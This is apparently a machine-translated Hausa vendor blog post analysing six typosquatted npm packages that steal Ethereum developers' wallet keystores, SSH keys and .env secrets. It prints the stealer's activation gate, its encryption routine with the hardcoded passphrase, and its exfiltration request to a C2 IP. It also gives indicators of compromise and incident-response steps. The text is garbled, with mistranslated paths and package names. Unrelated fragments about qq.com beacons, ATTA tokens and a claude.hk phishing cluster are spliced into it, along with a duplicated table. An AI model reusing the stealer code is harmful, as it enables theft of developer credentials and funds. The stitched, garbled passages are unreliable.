EVMDeFi npm Typosquatting Attack Ya Saci Maɓallan Masu Haɓaka

Harin EVM/DeFi npm na Typosquatting ya sace maɓallan masu haɓakawa

TL, DR

A ranar 6 ga Mayu, 2026, wani mai buga npm guda ɗaya, namikazesarada010206, sun tura fakiti shida masu cutarwa waɗanda ke kai hari ga yanayin halittu na masu haɓaka Ethereum, Solidity, da DeFi.

Kunshin, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Da kuma web3-utils-core, an yi amfani da sunaye masu kyau waɗanda aka tsara don kama da ɗakunan karatu na taimako don kayan aikin Web3 masu shahara.

Duk fakitin guda shida sun ƙunshi iri ɗaya telemetry.js fayil. Fayil ɗin yayi kama da byte a cikin rukunin, tare da SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Malware ɗin ba ya aiki a lokacin shigarwa. Babu preinstall or postinstall ƙugiya. Madadin haka, yana kunnawa lokacin da aka shigo da kunshin ta hanyar require().

Wannan bayanin yana da muhimmanci.

Tsarin dashen yana jira har sai mai haɓaka ya yi amfani da fakitin. Sannan yana duba ko wurin aiki yana kama da ainihin yanayin ci gaban Ethereum / Solidity. Yana neman maɓallan Alchemy ko Infura, maɓallan sirri, mnemonics, maɓallan deployer, ko kuma kundin adireshi na Foundry na gida.

Idan mai masaukin ya dace, mai satar zai tattara maɓallan sirri na SSH, maɓallan walat na Foundry / Geth / Brownie, .env* fayiloli, da kuma masu canjin yanayi masu mahimmanci. Yana ɓoye fakitin tare da AES-256-GCM ta amfani da kalmar sirri mai lamba kuma yana fitar da shi zuwa ƙarshen IPv4 C2 mara tushe tare da kashe tabbatarwar TLS.

Tsarin Gargaɗin Farko na Malware na Xygeni (MEW) ya tabbatar da cewa dukkan fakitin guda shida suna da lahani. Ana jiran rahoton cire rajistar npm.

Ƙungiyar: Fakiti Shida, Mai Bugawa Ɗaya

Asusun mai wallafawa namikazesarada010206 an haɗa shi da adireshin Gmail da ba a tabbatar ba namikazesarada010206@gmail.com.

Yaƙin neman zaɓen ya bayyana yayin da aka buga wallafe-wallafe na kwana ɗaya a ranar 6 ga Mayu, 2026. Duk fakitin guda shida an buga su kamar haka 1.0.0, ba shi da wani dogaro da lokacin gudu, kuma an aika fayiloli uku kawai:

package.json index.js telemetry.js

Sun kuma ayyana ma'ajiyar tushen iri ɗaya:

https://github.com/harunosakura030303-maker/evmchain-config

Na'urorin daukar hoto na MEW sun kama fakiti uku na farko a farkon bugawa. Sauran ukun an yi musu alama da ƙarfi bayan nazarin bayanan mai sharhi kan bayanin martabar npm na mawallafin. A da, sun yi kama da byte iri ɗaya. telemetry.js An tabbatar da cewa an rufe su a matsayin masu mugunta saboda daidaito.

Package version npm An buga Tikitin MEW hukunci
viem-core 1.0.0 2026-05-06 01:38:44Z #51049 Mal
viem-utils-core 1.0.0 2026-05-06 #51050 Mal
hardhat-core-utils 1.0.0 2026-05-06 #51051 Mal
evm-utils 1.0.0 2026-05-06 #51069 Mugunta, ta hanyar daidaito
kayan aikin gini 1.0.0 2026-05-06 #51071 Mugunta, ta hanyar daidaito
web3-utils-core 1.0.0 2026-05-06 #51070 Mugunta, ta hanyar daidaito

Tsarin sanya suna yana da sauƙi amma yana da tasiri.

Waɗannan fakitin ba sa kwaikwayon ainihin sunayen da ke sama. Madadin haka, suna amfani da ƙarin kalmomi masu amfani kamar -core, -utils, Da kuma -utils-coreWannan yana sa su yi kama da ɗakunan karatu na abokan hulɗa wanda mai haɓaka zai yi tsammanin gani kusa da kayan aikin Web3.

Kunshin Mugunta Halaltaccen Manufa
viem-core viem, sanannen abokin ciniki na Ethereum TypeScript
viem-utils-core viem
hardhat-core-utils hardhat, wani babban yanayi na ci gaban Solidity
evm-utils Tsarin suna na kayan aikin EVM na gama gari
kayan aikin gini masana'antar ma'adinai, wani kayan aiki mai ƙarfi
web3-utils-core web3-utils, masu taimakawa Web3.js

Wannan shine tsarin "ƙarin kunshin": ba "Ni ne ainihin kunshin ba," amma "Ina kama da mataimaki mai dacewa game da ainihin kunshin."

Ga masu haɓaka DeFi suna motsawa da sauri, hakan ya isa ya haifar da haɗari.

Me Ke Faruwa Idan An Shigo da Kunshin

Silsilar kai hari ƙarama ce, an yi niyya ne, kuma an mai da hankali ne kan yanayin ci gaban crypto.

Babu haɗin shigarwa. Madadin haka, kowane fakiti ya haɗa da index.js wanda ke fitar da aikin stub sannan ya ɗora wa ɓangaren telemetry mai cutarwa.

require('./telemetry').init();

Wannan yana nufin malware ɗin yana kunnawa a lokacin da aka fara shigo da shi.

Wannan yana da amfani ga mai kai hari a aikace. Yawancin na'urorin daukar hoto da akwatunan yadi suna mai da hankali kan halayen lokacin shigarwa. Wannan fakitin yana jira har sai mai haɓakawa, rubutun gini, gwajin kayan aiki, ko hanyar guduwa ta yi amfani da shi.

Ƙofar Kunnawa: Wuta Kawai akan Tashoshin Ma'aikata na Web3 na Gaskiya

Mafi mahimmancin ɓangaren dashen shine ƙofar kunnawa.

Malware yana duba masu canjin yanayi da aka saba samu akan injunan haɓaka Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Yana kuma duba ko an shigar da Foundry:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Idan babu ɗayan waɗannan sharuɗɗan, aikin zai dawo kuma ba zai yi komai ba.

Wannan yana sa kunshin ya yi shiru a yanayin nazarin gabaɗaya. Akwatin yashi ba tare da Foundry, Alchemy keys, Infura keys, private keys, ko menemonics na iya ganin wani abu mai kama da marar lahani ba.

A kan mai masaukin da ya dace, malware yana jira daƙiƙa 60 zuwa 90 kafin a tattara:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Jinkirin yana rage alaƙar da ke tsakanin shigo da kaya da fitar da ruwa. .unref() kira kuma yana barin tsarin mai masaukin baki ya fita yadda ya kamata idan an shigo da kunshin a cikin rubutun da ba zai daɗe ba.

Wannan ba dabi'a ce ta kwacewa da hayaniya ba. Sata ce da aka yi niyya don guje wa gudu sai dai idan yanayin masu haɓaka ya cancanci sata daga ciki.

Abin da Mai Sata Ya Tara

Da zarar ƙofar kunnawa ta wuce, malware ɗin yana tattarawa daga majiyoyin da suka fi muhimmanci a cikin haɓaka Web3: maɓallan sirri, shagunan maɓallan walat, takardun shaidar turawa, sirrin girgije, alamun npm, da kuma tsarin aikin gida.

source Abin da Aka Tara
tsari.env Duk wani canji mai daidaitawa /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Fayilolin da ke ɗauke da PRIVATE KEY ko BEGIN OPENSSH, gami da cikakken abun cikin fayil
~/.kayayyakin gini/maɓallan kaya/* Fayilolin keystore na Foundry walat
~/.ethereum/keystore/* Fayilolin keystore na Geth walat
~/.brownie/asusun/* Fayil ɗin maɓallan Brownie walat
${cwd}/.env Cikakken abun cikin fayil
${cwd}/.env.local Cikakken abun cikin fayil
${cwd}/.env.production Cikakken abun cikin fayil
${cwd}/.env.development Cikakken abun cikin fayil
sunan mai masaukin baki () Bayanan bayanai na mai masaukin baki
crypto.bazuwarUUID() Mai gano wanda aka zalunta/zaman
Kwanan wata.yanzu() Tambarin lokacin tattarawa
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Alamun ATTA sune:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Ba mu iya tabbatar da ko na'urar tantancewa ta mai aiki ce ko kuma wata hanyar samun kuɗi daban. Alamun ATTA iri ɗaya ne a cikin samfuran biyu da muka bincika.

Rukunin B: heibai

claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Satar Kuɗi

Samfurin ranar 1 ga Afrilu shine babban ɓangaren kamfen ɗin da ya fi kowanne muni.

heibai:2.1.88-claude.hk-4 ne ya wallafa wuguoqiangvip28, wani asusu da aka ƙirƙira a ranar 7 ga Yuni, 2025. Kunshin ya bayyana kansa a fili bisa ga doka 2.1.88 Sakin ɗan adam.

Ba ya damu da CA-cert MITM ba. Madadin haka, yana ƙarya ga mai amfani game da ƙarshen OAuth.

Karin abubuwa marasa kyau da aka yi a kan tushen Claude Code da aka fallasa sun hada da:

source Abin da Aka Tara
tsari.env Duk wani canji mai daidaitawa /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Fayilolin da ke ɗauke da PRIVATE KEY ko BEGIN OPENSSH, gami da cikakken abun cikin fayil
~/.kayayyakin gini/maɓallan kaya/* Fayilolin keystore na Foundry walat
~/.ethereum/keystore/* Fayilolin keystore na Geth walat
~/.brownie/asusun/* Fayil ɗin maɓallan Brownie walat
${cwd}/.env Cikakken abun cikin fayil
${cwd}/.env.local Cikakken abun cikin fayil
${cwd}/.env.production Cikakken abun cikin fayil
${cwd}/.env.development Cikakken abun cikin fayil
sunan mai masaukin baki () Bayanan bayanai na mai masaukin baki
crypto.bazuwarUUID() Mai gano wanda aka zalunta/zaman
Kwanan wata.yanzu() Tambarin lokacin tattarawa

Jerin abubuwan da aka nufa yana da matuƙar takamaiman bayani. Wannan ba satar burauza ba ce ta gama gari ko kuma rugujewar takardar shaidar gama gari. An nufa ne ga masu haɓaka software waɗanda ke ginawa, gwadawa, tura su, ko gudanar da aikace-aikacen Ethereum.

Haɗa maɓallan Foundry, Geth, da Brownie yana da matuƙar muhimmanci. Waɗannan fayiloli na iya wakiltar samun dama kai tsaye zuwa walat ko asalin tura su. Idan maharin zai iya haɗa su da kalmomin shiga, abubuwan tunawa, ko sirrin muhalli, za su iya ɗaukar kuɗi, yin kwaikwayon masu tura su, ko kuma yin sulhu da ayyukan kwangila masu wayo.

Ƙirƙirar Bayani Kafin Fitarwa

Malware yana ɓoye bayanan da aka tattara kafin a aika su.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Kalmar sirri mai lamba mai lamba ita ce:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

An naɗe nauyin ƙarshe kamar JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Ƙirƙirar bayanai ba ta sa malware ya ci gaba da bunkasa da kansa ba. Duk da haka, yana sa binciken hanyar sadarwa ya zama da wahala. Mai tsaron gida wanda ke kallon fitowar zai ga nauyin JSON, amma ba maɓallan da aka sace, fayilolin walat, ko .env abubuwan da ke ciki ba tare da kalmar sirri mai lamba da kuma dabarun warwarewa ba.

Fitarwa zuwa IPv4 C2 mara kyau

Hanyar fitar da ruwa an yi mata tsari mai tsauri:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Malware yana aika bayanai zuwa:

https://76.13.37.80:8443/api/v1/telemetry

Cikakkun bayanai guda biyu sun bayyana.

Da farko, C2 adireshin IPv4 ne kawai ba na yanki ba. Wannan yana kawar da buƙatar yin rijistar yanki kuma yana guje wa wasu gano tushen yanki.

Na biyu, tabbatar da TLS yana kashewa idan:

rejectUnauthorized: false

Wannan yana bawa malware damar karɓar kowace takardar shaida, gami da takaddun shaida da aka sanya wa hannu. A wata ma'anar, maharin yana samun jigilar bayanai ba tare da buƙatar takardar shaidar jama'a mai inganci ba.

Babu wata dabara ta sake gwadawa kuma babu mai masaukin baki. Ana haɗiye kurakurai a hankali. Wannan yana sa kunshin ya yi shiru idan C2 ba ya aiki a layi ko kuma ba a iya isa gare shi ba.

Me Yasa Wannan Gangamin Yafi Muhimmanci

Yawancin fakitin npm masu cutarwa waɗanda aka yi niyya don masu haɓakawa su bi manyan takaddun shaida: alamun npm, maɓallan AWS, alamun GitHub, ko .npmrc fayiloli.

Wannan kamfen ɗin yana rage abin da ake nema.

Yana neman alamun cewa na'urar ta kamfanin Ethereum ko Solidity ce. Sannan yana jawo ainihin kadarorin da ke da mahimmanci a wannan yanayin: shagunan maɓallan walat, maɓallan sirri, abubuwan tunawa, maɓallan deployer, .env fayiloli, da maɓallan SSH.

Wannan ya sa kamfen ɗin ya fi haɗari ga ƙungiyoyin Web3 fiye da satar npm na yau da kullun.

Nasarar kamuwa da cuta zai iya bayyana:

  • Wallet ɗin turawa
  • Maɓallan gudanarwa na kwangila mai wayo
  • Maɓallan mai bada RPC
  • Bayanan shigar da girgije
  • alamun bugawa na npm
  • Samun damar SSH zuwa ga mai haɓakawa ko kayan aikin ginawa
  • An adana sirrin aikin a cikin .env files
  • Maɓallan walat na Foundry, Geth, ko Brownie

Sunayen fakitin kuma suna nuna ingantaccen injiniyan zamantakewa. Suna yin niyya ga yanayin mahaliccin Web3 ta hanyar sunayen kayan aiki da aka saba da su: viem, hardhat, foundry, evm, Da kuma web3.

Ba sai ɗan wasan kwaikwayo ya yi wa ainihin ayyukan kwaskwarima ba. Suna buƙatar mai haɓaka kayan aiki kawai don shigar da abin da ya yi kama da kunshin abokin aiki mai ma'ana.

Alamomin Sasantawa da Ganowa

Fakiti da Mai Bugawa
Field darajar
mai bugawa npm namikazesarada010206
Imel ɗin mai wallafawa namikazesarada010206@gmail.com
An tabbatar da imel A'a
SCM tabbatar A'a
Maki mai suna 1.0
Pakete viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
versions Duk 1.0.0
Ma'ajiyar Tushe https://github.com/harunosakura030303-maker/evmchain-config
An tabbatar da aikata mugunta Duk fakiti shida
Network
type darajar
ƙarshen C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
Tashar C2 8443/tcp
Halayyar TLS rejectUnified: ƙarya
Tsarin nauyin kaya {"v":2,"iv": "d": "t": }
Fayiloli da Hashes
type darajar
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Tsarin fakitin package.json, index.js, telemetry.js
Adadin fayiloli 3
Kimanin jimlar girman 3.4 KB

Siginar kunnawa

Malware yana duba waɗannan masu canjin yanayi:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Yana kuma duba:

~/.foundry/

Hanyoyin Mai masaukin baki da aka yi niyya

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Regex Collection

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Bayanan Ganowa

Dokoki da dama sun shafi wannan kamfen ba tare da buƙatar cikakken nazarin ɗabi'u ba.

Da farko, duba fayilolin kulle don ganin sunayen fakitin da ba su da kyau guda shida:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Duk wani wasa da ya dace a ciki package-lock.json, yarn.lock, pnpm-lock.yaml, ko node_modules ya kamata a ɗauki tarihi a matsayin wani lamari mai tsanani.

Na biyu, saka idanu don Node.js yana karanta hanyoyin maɓallan walat:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Wannan ba kasafai ake samun halayya ta halal ga kunshin da aka shigo da shi azaman mai taimako ba. Yana da matukar shakku musamman idan aka biyo baya da ayyukan hanyar sadarwa ta waje.

Na uku, toshe ko faɗakar da kai game da haɗin HTTPS zuwa:

76.13.37.80:8443

Musamman idan hanyar neman ita ce:

/api/v1/telemetry

Na huɗu, nemi fakitin npm waɗanda suka haɗa waɗannan halaye:

  • Sabon mai wallafawa ko wanda ba shi da suna
  • Asusun Gmail mara tabbaci
  • Sunan fakitin da ke kusa da Web3
  • Babu wani tarihin adana bayanai mai mahimmanci
  • Tsarin ƙaramin kunshin
  • index.js wanda ke loda fayil ɗin telemetry ko mataimaki
  • Babu dogaro da lokacin gudu
  • Tarin yanayi mai laushi-canzawa
  • Samun damar shagon maɓallan walat

Wannan tsari ya fi amfani fiye da IOC guda ɗaya domin fakitin na gaba na iya canza adireshin IP amma yana riƙe da irin wannan dabarar manufa.

Jerin Abubuwan Da Suka Faru Tsakanin Masu Ba da Shawara

Idan mai haɓaka ya yi amfani da ɗaya daga cikin fakiti shida kuma yanayin wurin ya yi daidai da ƙofar kunnawa, ɗauki wurin aiki a matsayin wanda aka lalata.

Wannan ya haɗa da injina da aka sanya Foundry, maɓallan Alchemy ko Infura a cikin muhalli, maɓallan sirri, maɓallan tunawa, ko maɓallan deployer.

Amsar da aka ba da shawarar:

  • Cire haɗin mai masaukin baki daga hanyar sadarwa.
  • Tsare node_modules, fayilolin kullewa, tarihin harsashi, da kuma rajistan ayyukan bincike masu dacewa.
  • Juya kowane maɓalli na SSH a ƙarƙashin ~/.ssh/.
  • Juya maɓallan walat ga kowane maɓalli a ƙarƙashin ~/.foundry, ~/.ethereum, Da kuma ~/.brownie.
  • Matsar da kuɗi zuwa sabbin walat.
  • Juya duk wani sirri da aka adana a ciki .env* fayiloli a cikin ma'ajiyar bayanai, mai haɓaka aikin ya yi aiki a ciki.
  • Juya sirrin muhalli da suka dace da tsarin tattara bayanai, gami da maɓallan AWS, alamun npm, tura alamun, maɓallan API, maɓallan sirri, iri, da kuma abubuwan tunawa.
  • Girgije na dubawa, npm, GitHub, mai samar da RPC, da kuma ayyukan blockchain tun lokacin da aka fara shigar da fakitin.
  • Sake ɗaukar hoton wurin aiki kafin sake amfani da shi.

Abin da Masu Kare Ya Kamata Su Ɗauka

Wannan kamfen ɗin yana nuna yadda rubutun npm ke canzawa dangane da yanayin halittu masu daraja na masu haɓaka.

Jarumin bai buƙatar juriya ba. Ba sa buƙatar ɓoye sirrinsu. Ba ma buƙatar aiwatar da aikin lokacin shigarwa ba.

Madadin haka, sun dogara da abubuwa uku:

  • Sunayen fakitin Web3 masu yuwuwa
  • Kunnawa kawai akan injunan haɓaka crypto na gaske
  • Satar fayiloli kai tsaye da sirrin da suka fi muhimmanci ga masu haɓaka Ethereum

Wannan yana sa kamfen ɗin ya zama mai sauƙin rasawa a cikin babban bincike kuma yana da haɗari idan ya sauka a cikin yanayi mai kyau.

Ga ƙungiyoyin Web3, darasin a bayyane yake: a ɗauki sunayen masu dogaro da kai a matsayin wani ɓangare na tsarin barazanar ku. Kunshin da ya yi kama da mai taimako mara lahani har yanzu zai iya zama hanya mafi guntu ta warware matsalar walat.

An bayar da rahoto ga rajistar npm. Za mu sabunta wannan sakon idan aka cire asusun mawallafi da fakiti.

kayan aikin nazarin kayan aikin sca-tools-composition
Fifiko, gyara, da kuma kare haɗarin software ɗinka
Sami Asusunka Kyauta.
Babu katin bashi da ake bukata.

Tabbatar da Haɓaka Software da Isarwarka

tare da Xygeni Product Suite